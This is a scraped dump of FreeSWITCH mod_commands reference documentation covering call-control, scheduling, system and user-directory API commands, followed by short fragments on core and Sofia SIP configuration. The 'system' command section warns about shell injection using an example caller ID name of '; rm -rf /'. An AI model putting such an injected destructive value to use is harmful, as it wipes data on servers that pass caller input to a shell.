exits immediately!\nstatus Show current FS status. Very helpful information to provide when asking questions on the mailing list or irc channel.Usage: statusfreeswitch@internal\u0026gt; statusUP 17 years, 20 days, 10 hours, 10 minutes, 31 seconds, 571 milliseconds, 721 microsecondsFreeSWITCH (Version 1.5.8b git 87751f9 2013-12-13 18:13:56Z 32bit) is ready 53987253 session(s) since startup 127 session(s) - peak 127, last 5min 253 55 session(s) per Sec out of max 60, peak 55, last 5min 253 1000 session(s) max min idle cpu 0.00/97.71 strftime_tz Displays formatted time, converted to a specific timezone. See /usr/share/zoneinfo/zone.tab for the standard list of Linux timezones.Usage: strftime_tz [format_string]Example:strftime_tz US/Eastern %Y-%m-%d %T unload Unload external module.Usage: unload \u0026lt;mod_name\u0026gt; version Show version of the switchUsage: version [short]Examples:freeswitch@internal\u0026gt; versionFreeSWITCH Version 1.5.8b+git~20131213T181356Z~87751f9eaf~32bit (git 87751f9 2013-12-13 18:13:56Z 32bit)freeswitch@internal\u0026gt; version short1.5.8b xml_locate Write active xml tree or specified branch to stdout.Usage: xml_locate [root | | \u0026lt;tag_attr_name\u0026gt; \u0026lt;tag_attr_val\u0026gt;]xml_locate root will return all XML being used by FreeSWITCHxml_locate : Will return the XML corresponding to the specified xml_locate directoryxml_locate configurationxml_locate dialplanxml_locate phrasesExample:xml_locate directory domain name example.comxml_locate configuration configuration name ivr.conf xml_wrap Wrap another API command in XML.Usage: xml_wrap Call Management Commands break Deprecated. See uuid_break. create_uuid Creates a new UUID and returns it as a string.Usage: create_uuid originate Originate a new call.Usageoriginate \u0026lt;call_url\u0026gt; |\u0026amp;\u0026lt;application_name\u0026gt;(\u0026lt;app_args\u0026gt;) [] [] [\u0026lt;cid_name\u0026gt;] [\u0026lt;cid_num\u0026gt;] [\u0026lt;timeout_sec\u0026gt;]\nFreeSWITCH will originate a call to \u0026lt;call_url\u0026gt; as Leg A. If that leg supervises within 60 seconds FS will continue by searching for an extension definition in the specified dialplan for or else execute the application that follows the \u0026amp; along with its arguments.Originate Arguments Arguments \u0026lt;call_url\u0026gt; URL you are calling. For more info on sofia SIP URL syntax see: FreeSwitch Endpoint Sofia Destination, one of: Destination number to search in dialplan; note that registered extensions will fail this way, use \u0026amp;bridge(user/xxxx) instead \u0026amp;\u0026lt;application_name\u0026gt;(\u0026lt;app_args\u0026gt;) \u0026ldquo;\u0026amp;\u0026rdquo; indicates what follows is an application name, not an exten (\u0026lt;app_args\u0026gt;) is optional (not all applications require parameters, e.g. park) The most commonly used application names include:park, bridge, javascript/lua/perl, playback (remove mod_native_file). Note: Use single quotes to pass arguments with spaces, e.g. \u0026lsquo;\u0026amp;lua(test.lua arg1 arg2)\u0026rsquo; Note: There is no space between \u0026amp; and the application name Defaults to \u0026lsquo;XML\u0026rsquo; if not specified. Defaults to \u0026lsquo;default\u0026rsquo; if not specified. \u0026lt;cid_name\u0026gt; CallerID name to send to Leg A. \u0026lt;cid_num\u0026gt; CallerID number to send to Leg A. \u0026lt;timeout_sec\u0026gt; Timeout in seconds; default = 60 seconds. Originate Variables Variables These variables can be prepended to the dial string inside curly braces and separated by commas. Example:originate {sip_auto_answer=true,return_ring_ready=false}user/1001 9198Variables within braces must be separated by a comma.\ngroup_confirm_key group_confirm_file forked_dial fail_on_single_reject ignore_early_media - must be defined on Leg B in bridge or originate command to stop remote ringback from being heard by Leg A return_ring_ready originate_retries originate_retry_sleep_ms origination_caller_id_name origination_caller_id_number originate_timeout sip_auto_answer Description of originate\u0026rsquo;s related variables Originate Examples Examples You can call a locally registered sip endpoint 300 and park the call like so Note that the \u0026ldquo;example\u0026rdquo; profile used here must be the one to which 300 is registered. Also note the use of % instead of @ to indicate that it is a registered extension.originate sofia/example/300%pbx.internal \u0026amp;park()Or you could instead connect a remote sip endpoint to extension 8600originate sofia/example/300@foo.com 8600Or you could instead connect a remote SIP endpoint to another remote extensionoriginate sofia/example/300@foo.com \u0026amp;bridge(sofia/example/400@bar.com)Or you could even run a Javascript application test.jsoriginate sofia/example/1000@somewhere.com \u0026amp;javascript(test.js)To run a javascript with arguments you must surround it in single quotes.originate sofia/example/1000@somewhere.com \u0026lsquo;\u0026amp;javascript(test.js myArg1 myArg2)\u0026rsquo;Setting channel variables to the dial stringoriginate {ignore_early_media=true}sofia/mydomain.com/18005551212@1.2.3.4 15555551212Setting SIP header variables to send to another FS box during originateoriginate {sip_h_X-varA=111,sip_h_X-varB=222}sofia/mydomain.com/18005551212@1.2.3.4 15555551212Note: you can set any channel variable, even custom ones. Use single quotes to enclose values with spaces, commas, etc.originate {my_own_var=my_value}sofia/mydomain.com/that.ext@1.2.3.4 15555551212originate {my_own_var=\u0026lsquo;my value'}sofia/mydomain.com/that.ext@1.2.3.4 15555551212If you need to fake the ringback to the originated endpoint try this:originate {ringback='%(2000,4000,440.0,480.0)'}sofia/example/300@foo.com \u0026amp;bridge(sofia/example/400@bar.com)To specify a parameter to the Leg A call and the Leg B bridge application:originate {\u0026lsquo;origination_caller_id_number=2024561000\u0026rsquo;}sofia/gateway/whitehouse.gov/2125551212 \u0026amp;bridge([\u0026rsquo;effective_caller_id_number=7036971379\u0026rsquo;]sofia/gateway/pentagon.gov/3035554499)\nIf you need to make originate return immediately when the channel is in \u0026ldquo;Ring-Ready\u0026rdquo; state try this:originate {return_ring_ready=true}sofia/gateway/someprovider/919246461929 \u0026amp;socket(\u0026lsquo;127.0.0.1:8082 async full\u0026rsquo;)More info on return_ring_readyYou can even set music on hold for the ringback if you want:originate {ringback='/path/to/music.wav'}sofia/gateway/name/number \u0026amp;bridge(sofia/gateway/siptoshore/12425553741)You can originate a call in the background (asynchronously) and playback a message with a 60 second timeout.bgapi originate {ignore_early_media=true,originate_timeout=60}sofia/gateway/name/number \u0026amp;playback(message)You can specify the UUID of an originated call by doing the following:\nUse create_uuid to generate a UUID to use. This will allow you to kill an originated call before it is answered by using uuid_kill. If you specify origination_uuid it will remain the UUID for the answered call leg for the whole session. originate {origination_uuid=...}user/100@domain.name.comHere\u0026rsquo;s an example of originating a call to the echo conference (an external sip URL) and bridging it to a local user\u0026rsquo;s phone:originate sofia/internal/9996@conference.freeswitch.org \u0026amp;bridge(user/105@default)Here\u0026rsquo;s an example of originating a call to an extension in a different context than \u0026lsquo;default\u0026rsquo; (required for the FreePBX which uses context_1, context_2, etc.):originate sofia/internal/2001@foo.com 3001 xml context_3You can also originate to multiple extensions as follows:originate user/1001,user/1002,user/1003 \u0026amp;park()To put an outbound call into a conference at early media, either of these will work (they are effectively the same thing)originate sofia/example/300@foo.com \u0026amp;conference(conf_uuid-TEST_CON)originate sofia/example/300@foo.com conference:conf_uuid-TEST_CON inlineSee mod_dptools: Inline Dialplan for more detail on \u0026lsquo;inline\u0026rsquo; DialplansAn example of using loopback and inline on the A-leg can be found in this mailing list post pause Pause playback of recorded media that was started with uuid_broadcast.Usagepause \u0026lt;on|off\u0026gt;Turning pause \u0026ldquo;on\u0026rdquo; activates the pause function, i.e. it pauses the playback of recorded media. Turning pause \u0026ldquo;off\u0026rdquo; deactivates the pause function and resumes playback of recorded media at the same point where it was paused.Note: always returns -ERR no reply when successful; returns -ERR No such channel! when uuid is invalid. uuid_answer Answer a channelUsageuuid_answer See Also\nmod_dptools: answer uuid_audio Adjust the audio levels on a channel or mute (read/write) via a media bug.Usageuuid_audio [start [read|write] [[mute|level] ]|stop] is in the range from -4 to 4, 0 being the default value.Level is required for both mute|level params:freeswitch@internal\u0026gt; uuid_audio 0d7c3b93-a5ae-4964-9e4d-902bba50bd19 start write mute freeswitch@internal\u0026gt; uuid_audio 0d7c3b93-a5ae-4964-9e4d-902bba50bd19 start write level (This command behaves funky. Requires further testing to vet all arguments. - JB)See Also\nmod_dptools: set audio level uuid_break Break out of media being sent to a channel. For example, if an audio file is being played to a channel, issuing uuid_break will discontinue the media and the call will move on in the dialplan, script, or whatever is controlling the call.Usage: uuid_break [all]If the all flag is used then all audio files/prompts/etc. that are queued up to be played to the channel will be stopped and removed from the queue, otherwise only the currently playing media will be stopped. uuid_bridge Bridge two call legs together.Usageuuid_bridge \u0026lt;other_uuid\u0026gt;uuid_bridge needs at least any one leg to be in the answered state. If, for example, one channel is parked and another channel is actively conversing on a call, executing uuid_bridge on these 2 channels will drop the existing call and bridge together the specified channels. uuid_broadcast Execute an arbitrary dialplan application, typically playing a media file, on a specific uuid. If a filename is specified then it is played into the channel(s). To execute an application use \u0026ldquo;app::args\u0026rdquo; syntax.Usageuuid_broadcast [aleg|bleg|both]Execute an application on a chosen leg(s) with optional hangup afterwards:Usageuuid_broadcast app[![hangup_cause]]::args [aleg|bleg|both]Examples:Exampleuuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e sorry.wav bothuuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say::en\\snumber\\spronounced\\s12345 aleguuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say!::en\\snumber\\spronounced\\s12345 aleguuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say!user_busy::en\\snumber\\spronounced\\s12345 aleguuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e playback!user_busy::sorry.wav aleg uuid_buglist List the media bugs on channel. Output is formatted as XML.Usage\nuuid_buglist uuid_chat Send a chat message.Usageuuid_chat If the endpoint associated with the session has a receive_event handler, this message gets sent to that session and is interpreted as an instant message. uuid_debug_media Debug media, either audio or video.Usageuuid_debug_media \u0026lt;read|write|both|vread|vwrite|vboth\u0026gt; \u0026lt;on|off\u0026gt;Use \u0026ldquo;read\u0026rdquo; or \u0026ldquo;write\u0026rdquo; for the audio direction to debug, or \u0026ldquo;both\u0026rdquo; for both directions. And prefix with v for video media.uuid_debug_media emits a HUGE amount of data. If you invoke this command from fs_cli, be prepared.\nExample outputR sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=2981605109 m=0W sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=12212960 m=0R sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=2981605269 m=0W sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=12213120 m=0 Read Format \u0026ldquo;R %s b=%4ld %s:%u %s:%u %s:%u pt=%d ts=%u m=%d\\n\u0026rdquo;where the values are:\nswitch_channel_get_name(switch_core_session_get_channel(session)), (long) bytes, my_host, switch_sockaddr_get_port(rtp_session-\u0026gt;local_addr), old_host, rtp_session-\u0026gt;remote_port, tx_host, switch_sockaddr_get_port(rtp_session-\u0026gt;from_addr), rtp_session-\u0026gt;recv_msg.header.pt, ntohl(rtp_session-\u0026gt;recv_msg.header.ts), rtp_session-\u0026gt;recv_msg.header.m Write Format \u0026ldquo;W %s b=%4ld %s:%u %s:%u %s:%u pt=%d ts=%u m=%d\\n\u0026rdquo;where the values are:\nswitch_channel_get_name(switch_core_session_get_channel(session)), (long) bytes, my_host, switch_sockaddr_get_port(rtp_session-\u0026gt;local_addr), old_host, rtp_session-\u0026gt;remote_port, tx_host, switch_sockaddr_get_port(rtp_session-\u0026gt;from_addr), send_msg-\u0026gt;header.pt, ntohl(send_msg-\u0026gt;header.ts), send_msg-\u0026gt;header.m); uuid_deflect Deflect an answered SIP call off of FreeSWITCH by sending the REFER methodUsage: uuid_deflect uuid_deflect waits for the final response from the far end to be reported. It returns the sip fragment from that response as the text in the FreeSWITCH response to uuid_deflect. If the far end reports the REFER was successful, then FreeSWITCH will issue a bye on the channel.Exampleuuid_deflect 0c9520c4-58e7-40c4-b7e3-819d72a98614 sip:info@example.netResponse:Content-Type: api/responseContent-Length: 30+OK:SIP/2.0 486 Busy Here uuid_displace Displace the audio for the target with the specified audio .Usage: uuid_displace [start|stop] [] [mux]Arguments:\nuuid = Unique ID of this call (see \u0026lsquo;show channels\u0026rsquo;) start|stop = Start or stop this action file = path to an audio source (.wav file, shoutcast stream, etc\u0026hellip;) limit = limit number of seconds before terminating the displacement mux = multiplex; mix the original audio together with \u0026lsquo;file\u0026rsquo;, i.e. both parties can still converse while the file is playing (if the level is not too loud) To specify the 5th argument \u0026lsquo;mux\u0026rsquo; you must specify a limit; if no time limit is desired on playback, then specify 0.Examplescli\u0026gt; uuid_displace 1a152be6-2359-11dc-8f1e-4d36f239dfb5 start /sounds/test.wav 60cli\u0026gt; uuid_displace 1a152be6-2359-11dc-8f1e-4d36f239dfb5 stop /sounds/test.wav\nuuid_display Updates the display on a phone if the phone supports this. This works on some SIP phones right now including Polycom and Snom.Usage: name|numberNote the pipe character separating the Caller ID name and Caller ID number.This command makes the phone re-negotiate the codec. The SIP -\u0026gt; RTP Packet Size should be 0.020 seconds. If it is set to 0.030 on the Cisco SPA series phones it causes a DTMF lag. When DTMF keys are pressed on the phone they are can be seen on the fs_cli 4-6 seconds late.Example:freeswitch@sidious\u0026gt; uuid_display f4053af7-a3b9-4c78-93e1-74e529658573 Fred Jones|1001+OK Success\nuuid_dual_transfer Transfer each leg of a call to different destinations.Usage: [/][/] [/][/] uuid_dump Dumps all variable values for a session.Usage: uuid_dump [format]Format options: txt (default, may be omitted), XML, JSON, plain uuid_early_ok Stops the process of ignoring early media, i.e. if ignore_early_media=true, this stops ignoring early media coming from Leg B and responds normally.Usage: uuid_early_ok uuid_exists Checks whether a given UUID exists.Usage: uuid_exists Returns true or false. uuid_flush_dtmf Flush queued DTMF digitsUsage: uuid_flush_dtmf uuid_fileman Manage the audio being played into a channel from a sound fileUsage: uuid_fileman cmd:valCommands are:\nspeed:\u0026lt;+[step]\u0026gt;|\u0026lt;-[step]\u0026gt; volume:\u0026lt;+[step]\u0026gt;|\u0026lt;-[step]\u0026gt; pause (toggle) stop truncate restart seek:\u0026lt;+[milliseconds]\u0026gt;|\u0026lt;-[milliseconds]\u0026gt; (1000ms = 1 second, 10000ms = 10 seconds.) Example to seek forward 30 seconds:uuid_fileman 0171ded1-2c31-445a-bb19-c74c659b7d08 seek:+3000(Or use the current channel via ${uuid}, e.g. in a bind_digit_action)The \u0026lsquo;pause\u0026rsquo; argument is a toggle: the first time it is invoked it will pause playback, the second time it will resume playback. uuid_getvar Get a variable from a channel.Usage: uuid_getvar uuid_hold Place a channel on hold.Usage:uuid_hold place a call on holduuid_hold off switch off on holduuid_hold toggle toggles call-state based on current call-state uuid_kill Reset a specific channel.Usage: uuid_kill [cause]If no cause code is specified, NORMAL_CLEARING will be used. uuid_limit Apply or change limit(s) on a specified uuid.Usage: uuid_limit [[/interval]] [number [dialplan [context]]]See also mod_dptools: Limit uuid_media Reinvite FreeSWITCH out of the media path:Usage: uuid_media [off] Reinvite FreeSWITCH back in:Usage: uuid_media uuid_media_reneg Tell a channel to send a re-invite with optional list of new codecs to be renegotiated.Usage: uuid_media_reneg \u0026lt;=\u0026gt;Example: Adding =PCMU makes the offered codec string absolute. uuid_park Park callUsage: uuid_park The specified channel will be parked and the other leg of the call will be disconnected. uuid_pre_answer Pre–answer a channel.Usage: uuid_preanswer See Also: Misc._Dialplan_Tools_pre_answer uuid_preprocess Pre-process ChannelUsage: uuid_preprocess uuid_recv_dtmf Usage: uuid_recv_dtmf \u0026lt;dtmf_data\u0026gt;\nuuid_send_dtmf Send DTMF digits to Usage: uuid_send_dtmf [@\u0026lt;tone_duration\u0026gt;]Use the character w for a .5 second delay and the character W for a 1 second delay.Default tone duration is 2000ms . uuid_send_info Send info to the endpointUsage: uuid_send_info uuid_session_heartbeat Usage: uuid_session_heartbeat [sched] [0|] uuid_setvar Set a variable on a channel. If value is omitted, the variable is unset.Usage: uuid_setvar [value] uuid_setvar_multi Set multiple vars on a channel.Usage: uuid_setvar_multi =[;=[;\u0026hellip;]] uuid_simplify This command directs FreeSWITCH to remove itself from the SIP signaling path if it can safely do so.Usage: uuid_simplify Execute this API command to instruct FreeSWITCH™ to inspect the Leg A and Leg B network addresses. If they are both hosted by the same switch as a result of a transfer or forwarding loop across a number of FreeSWITCH™ systems the one executing this command will remove itself from the SIP and media path and restore the endpoints to their local FreeSWITCH™ to shorten the network path. This is particularly useful in large distributed FreeSWITCH™ installations.For example, suppose a call arrives at a FreeSWITCH™ box in Los Angeles, is answered, then forwarded to a FreeSWITCH™ box in London, answered there and then forwarded back to Los Angeles. The London switch could execute uuid_simplify to tell its local switch to examine both legs of the call to determine that they could be hosted by the Los Angeles switch since both legs are local to it. Alternatively, setting sip_auto_simplify to true either globally in vars.xml or as part of a dailplan extension would tell FS to perform this check for each call when both legs supervise. uuid_transfer Transfers an existing call to a specific extension within a and . Dialplan may be \u0026ldquo;xml\u0026rdquo; or \u0026ldquo;directory\u0026rdquo;.Usageuuid_transfer [-bleg|-both] [] []\nThe optional first argument will allow you to transfer both parties (-both) or only the party to whom is talking.(-bleg). Beware that -bleg actually means \u0026ldquo;the other leg\u0026rdquo;, so when it is executed on the actual B leg uuid it will transfer the actual A leg that originated the call and disconnect the actual B leg.NOTE: if the call has been bridged, and you want to transfer either side of the call, then you will need to use (or the API equivalent). If it\u0026rsquo;s not set, transfer doesn\u0026rsquo;t really work as you\u0026rsquo;d expect, and leaves calls in limbo.And more examples see Inline Dialplan uuid_phone_event Send hold indication upstream:Usageuuid_phone_event hold|talk\nRecord/Playback Commands uuid_record Record the audio associated with the given UUID into a file. The start command causes FreeSWITCH to start mixing all call legs together and saves the result as a file in the format that the file\u0026rsquo;s extension dictates. (if available) The stop command will stop the recording and close the file. If media setup hasn\u0026rsquo;t yet happened, the file will contain silent audio until media is available. Audio will be recorded for calls that are parked. The recording will continue through the bridged call. If the call is set to return to park after the bridge, the bug will remain on the call, but no audio is recorded until the call is bridged again. (TODO: What if media doesn\u0026rsquo;t flow through FreeSWITCH? Will it re-INVITE first? Or do we just not get the audio in that case?)Usage:uuid_record [start|stop|mask|unmask] []Where limit is the max number of seconds to record.If the path is not specified on start it will default to the channel variable \u0026ldquo;sound_prefix\u0026rdquo; or FreeSWITCH base_dir when the \u0026ldquo;sound_prefix\u0026rdquo; is empty.You may also specify \u0026ldquo;all\u0026rdquo; for path when stop is used to remove all for this uuid\u0026ldquo;stop\u0026rdquo; command must be followed by option.\u0026ldquo;mask\u0026rdquo; will mask with silence part of the recording beginning when the mask argument is executed by this command. see http://jira.freeswitch.org/browse/FS-5269.\u0026ldquo;unmask\u0026rdquo; will stop the masking and continue recording live audio normally.See record\u0026rsquo;s related variablesyou will also want to see mod_dptools: record_session Limit Commands More information is available at Limit commands limit_reset Reset a limit backend. limit_status Retrieve status from a limit backend. limit_usage Retrieve usage for a given resource. uuid_limit_release Manually decrease a resource usage by one. limit_interval_reset Reset the interval counter to zero prior to the start of the next interval. Miscellaneous Commands bg_system Execute a system command in the background.Usage: bg_system echo Echo input back to the consoleUsage: echo Example:echo This text will appearThis text will appear file_exists Tests whether filename exists.file_exists filenameExamples:freeswitch\u0026gt; file_exists /tmp/real_filetrue\nfreeswitch\u0026gt; file_exists /tmp/missing_filefalseExample dialplan usage:file_exists example\nfile_exists tests whether FreeSWITCH can see the file, but the file may still be unreadable because of restrictive permissions.\nfind_user_xml Checks to see if a user exists. Matches user tags found in the directory, similar to user_exists, but returns an XML representation of the user as defined in the directory (like the one shown in user_exists).Usage: find_user_xml references a key specified in a directory\u0026rsquo;s user tag represents the value of the key is the domain to which the user is assigned. list_users Lists Users configured in DirectoryUsage:list_users [group ] [domain ] [user ] [context ]Examples:freeswitch@localhost\u0026gt; list_users group default\nuserid|context|domain|group|contact|callgroup|effective_caller_id_name|effective_caller_id_number2000|default|192.168.20.73|default|sofia/internal/sip:2000@192.168.20.219:5060|techsupport|B#-Test 2000|20002001|default|192.168.20.73|default|sofia/internal/sip:2001@192.168.20.150:63412;rinstance=8e2c8b86809acf2a|techsupport|Test 2001|20012002|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2002|20022003|default|192.168.20.73|default|sofia/internal/sip:2003@192.168.20.149:5060|techsupport|Test 2003|20032004|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2004|2004\n+OKSearch filters can be combined:freeswitch@localhost\u0026gt; list_users group default user 2004\nuserid|context|domain|group|contact|callgroup|effective_caller_id_name|effective_caller_id_number2004|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2004|2004\n+OK sched_api Schedule an API call in the future.Usage:sched_api [+@] \u0026lt;group_name\u0026gt; \u0026lt;command_string\u0026gt;[\u0026amp;] is the UNIX timestamp at which the command should be executed. If it is prefixed by +, specifies the number of seconds to wait before executing the command. If prefixed by @, it will execute the command periodically every seconds; for the first instance it will be executed after seconds.\u0026lt;group_name\u0026gt; will be the value of \u0026ldquo;Task-Group\u0026rdquo; in generated events. \u0026ldquo;none\u0026rdquo; is the proper value for no group. If set to UUID of channel (example: ${uuid}), task will automatically be unscheduled when channel hangs up.\u0026lt;command_string\u0026gt; is the command to execute at the scheduled time.A scheduled task or group of tasks can be revoked with sched_del or unsched_api.You could append the \u0026ldquo;\u0026amp;\u0026rdquo; symbol to the end of the line to executed this command in its own thread.Example:sched_api +1800 none originate sofia/internal/1000%${sip_profile} \u0026amp;echo()sched_api @600 check_sched log Periodic task is running\u0026hellip;sched_api +10 ${uuid} chat verto|fs@mydomain.com|1000@mydomain.com|Hello World sched_broadcast Play a file to a specific call in the future.Usage:sched_broadcast [[+]|@time] [aleg|bleg|both]Schedule execution of an application on a chosen leg(s) with optional hangup:sched_broadcast [+] app[![hangup_cause]]::args [aleg|bleg|both] is the UNIX timestamp at which the command should be executed. If it is prefixed by +, specifies the number of seconds to wait before executing the command. If prefixed by @, it will execute the command periodically every seconds; for the first instance it will be executed after seconds.Examples:sched_broadcast +60 336889f2-1868-11de-81a9-3f4acc8e505e commercial.wav bothsched_broadcast +60 336889f2-1868-11de-81a9-3f4acc8e505e say::en\\snumber\\spronounced\\s12345 aleg sched_del Removes a prior scheduled group or task IDUsage:sched_del \u0026lt;group_name|task_id\u0026gt;The one argument can either be a group of prior scheduled tasks or the returned task-id from sched_api.sched_transfer, sched_hangup and sched_broadcast commands add new tasks with group names equal to the channel UUID. Thus, sched_del with the channel UUID as the argument will remove all previously scheduled hangups, transfers and broadcasts for this channel.Examples:sched_del my_groupsched_del 2 sched_hangup Schedule a running call to hangup.Usage:sched_hangup [+] []sched_hangup +0 is the same as uuid_kill sched_transfer Schedule a transfer for a running call.Usage:sched_transfer [+] [] [] stun Executes a STUN lookup.Usage:stun [:port]Example:stun stun.freeswitch.org system Execute a system command.Usage:system The is passed to the system shell, where it may be expanded or interpreted in ways you don\u0026rsquo;t expect. This can lead to security bugs if you\u0026rsquo;re not careful. For example, the following command is dangerous:If a malicious remote caller somehow sets his caller ID name to \u0026ldquo;; rm -rf /\u0026rdquo; you would unintentionally be executing this shell command:log_caller_name; rm -rf /This would be a Bad Thing. time_test Runs a test to see how bad timer jitter is. It runs the test times if specified, otherwise it uses the default count of 10, and tries to sleep for mss microseconds. It returns the actual timer duration along with an average.Usage:time_test [count]Example:time_test 100 5\ntest 1 sleep 100 99test 2 sleep 100 97test 3 sleep 100 96test 4 sleep 100 97test 5 sleep 100 102avg 98 timer_test Runs a test to see how bad timer jitter is. Unlike time_test, this uses the actual FreeSWITCH timer infrastructure to do the timer test and exercises the timers used for call processing.Usage:timer_test \u0026lt;10|20|40|60|120\u0026gt; [\u0026lt;1..200\u0026gt;] [\u0026lt;timer_name\u0026gt;]The first argument is the timer interval.The second is the number of test iterations.The third is the timer name; \u0026ldquo;show timers\u0026rdquo; will give you a list.Example:timer_test 20 3\nAvg: 16.408ms Total Time: 49.269ms\n2010-01-29 12:01:15.504280 [CONSOLE] mod_commands.c:310 Timer Test: 1 sleep 20 92542010-01-29 12:01:15.524351 [CONSOLE] mod_commands.c:310 Timer Test: 2 sleep 20 200422010-01-29 12:01:15.544336 [CONSOLE] mod_commands.c:310 Timer Test: 3 sleep 20 19928 tone_detect Start Tone Detection on a channel.Usage:tone_detect \u0026lt;tone_spec\u0026gt; [ ] is required when this is executed as an api call; as a dialplan app the uuid is implicit as part of the channel variables is an arbitrary name that identifies this tone_detect instance; required\u0026lt;tone_spec\u0026gt; frequencies to detect; required \u0026lsquo;r\u0026rsquo; or \u0026lsquo;w\u0026rsquo; to specify which direction to monitor duration during which to detect tones;0 = detect forever+time = number of milliseconds after tone_detect is executedtime = absolute time to stop in seconds since The Epoch (1 January, 1970) FS application to execute when tone_detect is triggered; if app is omitted, only an event will be returned arguments to application enclosed in single quotes the number of times tone_detect should be triggered before executing the specified appOnce tone_detect returns a result, it will not trigger again until reset. Reset tone_detect by calling tone_detect with no additional arguments to reactivate the previously specified tone_detect declaration.See also http://wiki.freeswitch.org/wiki/Misc._Dialplan_Tools_tone_detect unsched_api Unschedule a previously scheduled API command.Usage:unsched_api \u0026lt;task_id\u0026gt; url_decode Usage:url_decode url_encode Url encode a string.Usage:url_encode user_data Retrieves user information (parameters or variables) as defined in the FreeSWITCH user directory.Usage:user_data @ \u0026lt;attr|var|param\u0026gt; is the user\u0026rsquo;s id is the user\u0026rsquo;s domain\u0026lt;attr|var|param\u0026gt; specifies whether the requested data is contained in the \u0026ldquo;variables\u0026rdquo; or \u0026ldquo;parameters\u0026rdquo; section of the user\u0026rsquo;s record is the name (key) of the variable to retrieveExamples:user_data 1000@192.168.1.101 param passwordwill return a result of 1234, anduser_data 1000@192.168.1.101 var accountcodewill return a result of 1000 from the example user shown in user_exists, anduser_data 1000@192.168.1.101 attr idwill return the user\u0026rsquo;s actual alphanumeric ID (i.e. \u0026ldquo;john\u0026rdquo;) when number-alias=\u0026ldquo;1000\u0026rdquo; was set as an attribute for that user. user_exists Checks to see if a user exists. Matches user tags found in the directory and returns either true/false:Usage:user_exists references a key specified in a directory\u0026rsquo;s user tag represents the value of the key is the domain to which the user belongsExample:user_exists id 1000 192.168.1.101will return true where there exists in the directory a user with a key called id whose value equals 1000:User Directory EntryIn the above example, we also could have tested for randomvar:user_exists randomvar 45 192.168.1.101And we would have received the same true result, but:user_exists accountcode 1000 192.168.1.101oruser_exists vm-password 1000 192.168.1.101Would have returned false.\n","permalink":"https://wdd.js.org/freeswitch/mod-command/","summary":"Usage CLI See below. API/Event Interfaces mod_event_socket mod_erlang_event mod_xml_rpc Scripting Interfaces mod_perl mod_v8 mod_python mod_lua From the Dialplan An API command can be called from the dialplan. Example:Invoke API Command From DialplanOther examples:Other Dialplan API Command ExamplesAPI commands with multiple arguments usually have the arguments separated by a space:Multiple Arguments\nDialplan UsageIf you are calling an API command from the dialplan make absolutely certain that there isn\u0026rsquo;t already a dialplan application that gives you the functionality you are looking for.","title":"mod_commands"},{"content":"The FreeSWITCH core configuration is contained in autoload_configs/switch.conf.xml\nDefault key bindings Function keys can be mapped to API commands using the following configuration:The default keybindings are;F1 = helpF2 = statusF3 = show channelsF4 = show callsF5 = sofia statusF6 = reloadxmlF7 = console loglevel 0F8 = console loglevel 7F9 = sofia status profile internalF10 = sofia profile internal siptrace onF11 = sofia profile internal siptrace offF12 = versionBeware that the option loglevel is actually setting the minimum hard_log_Level in the application. What this means is if you set this to something other than DEBUG no matter what log level you set the console to one you start up you will not be able to get any log messages below the level you set. Also be careful of mis-typing a log level, if the log level is not correct it will default to a hard_log_level of 0. This means that virtually no log messages will show up anywhere. Core parameters core-db-dsn Allows to use ODBC database instead of sqlite3 for freeswitch core.Syntaxdsn:user:pass max-db-handlesMaximum number of simultaneous DB handles open db-handle-timeout Maximum number of seconds to wait for a new DB handle before failing disable-monotonic-timing (bool) disables monotonic timer/clock support if it is broken on your system. enable-use-system-time Enables FreeSWITCH to use system time. initial-event-threads Number of event dispatch threads to allocate in the core. Default is 1.If you see the WARNING \u0026ldquo;Create additional event dispatch thread\u0026rdquo; on a heavily loaded server, you could increase the number of threads to prevent the system from falling behind. loglevel amount of detail to show in log max-sessions limits the total number of concurrent channels on your FreeSWITCH™ system. sessions-per-second throttling mechanism, the switch will only create this many channels at most, per second. rtp-start-port RTP port range begin rtp-end-port RTP port range end Variables Variables are default channel variables set on each channel automatically. Example config ","permalink":"https://wdd.js.org/freeswitch/xml-config/","summary":"The FreeSWITCH core configuration is contained in autoload_configs/switch.conf.xml\nDefault key bindings Function keys can be mapped to API commands using the following configuration:The default keybindings are;F1 = helpF2 = statusF3 = show channelsF4 = show callsF5 = sofia statusF6 = reloadxmlF7 = console loglevel 0F8 = console loglevel 7F9 = sofia status profile internalF10 = sofia profile internal siptrace onF11 = sofia profile internal siptrace offF12 = versionBeware that the option loglevel is actually setting the minimum hard_log_Level in the application.","title":"XML Switch Configuration"},{"content":"Sofia is a SIP stack used by FreeSWITCH. When you see \u0026ldquo;sofia\u0026rdquo; anywhere in your configuration, think \u0026ldquo;This is SIP stuff.\u0026rdquo; It takes a while to master it all, so please be patient with yourself. SIP is a crazy protocol and it will make you crazy too if you aren\u0026rsquo;t careful. Read on for information on setting up SIP/Sofia in your FreeSWITCH configuration.\nmod_sofia exposes the Sofia API and sets up the FreeSWITCH SIP endpoint. Endpoint A FreeSWITCH endpoint represents a full user agent and controls the signaling protocol and media streaming necessary to process calls. The endpoint is analogous to a physical VoIP telephone sitting on your desk. It speaks a particular protocol such as SIP or Verto, to the outside world and interprets that for the FreeSWITCH core. Configuration Files sofia.conf.xml contains the configuration settings for mod_sofiaSee Sofia Configuration Files. SIP profiles See SIP profiles section in Configuring FreeSWITCH. What if these commands don\u0026rsquo;t work for me? Make sure that you are not running another SIP server at the same time as FreeSWITCH. It is not always obvious that another SIP server is running. If you type in Sofia commands such as \u0026lsquo;sofia status profile default\u0026rsquo; and it doesn\u0026rsquo;t work then you may have another SIP server running. Stop the other SIP server and restart 